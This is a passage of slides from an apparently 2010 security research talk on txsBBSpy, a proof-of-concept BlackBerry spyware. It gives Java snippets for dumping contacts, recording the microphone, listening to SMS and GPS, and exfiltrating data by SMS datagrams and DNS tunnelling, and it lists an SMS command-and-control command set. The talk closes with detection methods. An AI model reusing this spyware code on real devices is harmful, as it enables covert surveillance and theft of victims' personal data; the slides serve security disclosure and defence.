Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 31
32.
V5.0.0.328 Default 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 32
33.
V5.0.0.328 Trusted 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
34.
Installation Methods © 2010
Veracode, Inc. 34
35.
Installation Methods Accessing
a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation) Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer Blackberry BES push the application to your user community Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 35
36.
Installation Files .COD
files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code. .JAD files: An application descriptor that stores information about the application itself and the location of .COD files .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata. .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 36
37.
txsBBSpy Effects and
Behaviors © 2010 Veracode, Inc. 37
38.
txsBBSpy Logging and
Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
39.
txsBBSpy Exfiltration and
C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
40.
txsBBSpy Technical Specifications ©
2010 Veracode, Inc. 40
41.
Technical Methods Data
Dumpers Listeners Exfiltration Methods Command and Control © 2010 Veracode, Inc. 41
42.
Dump Contact Information
API – javax.microedition.pim – net.rim.blackberry.API.pdap Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
43.
Dump Microphone API
– javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 43
44.
Location Listener Create
the class that implements LocationListener Interface Get LocationProvider instance Add LocationListener API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 47
45.
SMS Outbound Listener
Create class that implements “SendListener” interface Add the SendListener API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 48
46.
PIM Listener Create
the class that implements PIMListListener Interface Open Target PIMList and Add PIMListListener API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 51
47.
SMS Datagram Exfiltration
API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 52
48.
DNS Exfiltration do {
// Code to trim the message to 200 chars per iteration } try { msg2 = Base64OutputStream.encodeAsString(msg2.getBytes(), 0, msg2.length(), false, false); conn = (DatagramConnection)Connector.open("udp://"+msg2+"."+this.domain+":7272;4444 "); conn.close(); } catch (ConnectionNotFoundException e) { return; } catch (IOException e){ // Do nothing, just catch and ignore } } while (msg.length() > 200); © 2010 Veracode, Inc. 54
49.
Threaded Exfiltration Listener
based exfiltration methods use separate thread Doesn‟t freeze UI interface Queues messages outbound if network is slow ThreadedSend extends Thread class Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 58
50.
Command and Control
Channels Default is inbound SMS communication Bi-drectional TXSPROTO TCP based command and control – Additional Stealth (intentionally not completely invisible) – Allows for pretty GUI clients (basic mock up done) – Will more easily allow for control of multiple victims – Can be used to easily implement novelty attacks Swap the contact databases of two victims Easily have phone A call phone B Integrated Google earth tracking of victim without parsing return email responses Much more shenanigans! © 2010 Veracode, Inc. 59
51.
Command and Control
Channels initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 60
52.
Methods of Detection
and Future Work © 2010 Veracode, Inc. 61
53.
Methods of Detection
Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration Signature Based – This is how the current anti-virus world is failing Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 62
54.
Future Work (Offensive
AND Defensive) Reverse engineer .cod file format Continued research into unobstructed installation methods (requires exploitation) Infect PC with virus that acts as distribution hub Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 63
55.
Demonstration © 2010 Veracode,
Inc. 64
56.
Conclusion We are
currently trusting the vendor application store provider for the majority of our mobile device security Minimal methods of real time eradication or detection of spyware type activities No easy/automated way to confirm for ourselves what the applications are actually doing © 2010 Veracode, Inc. 65
57.
The Monkey Steals
the Berries! Questions? © 2010 Veracode, Inc. 66
58.
Questions?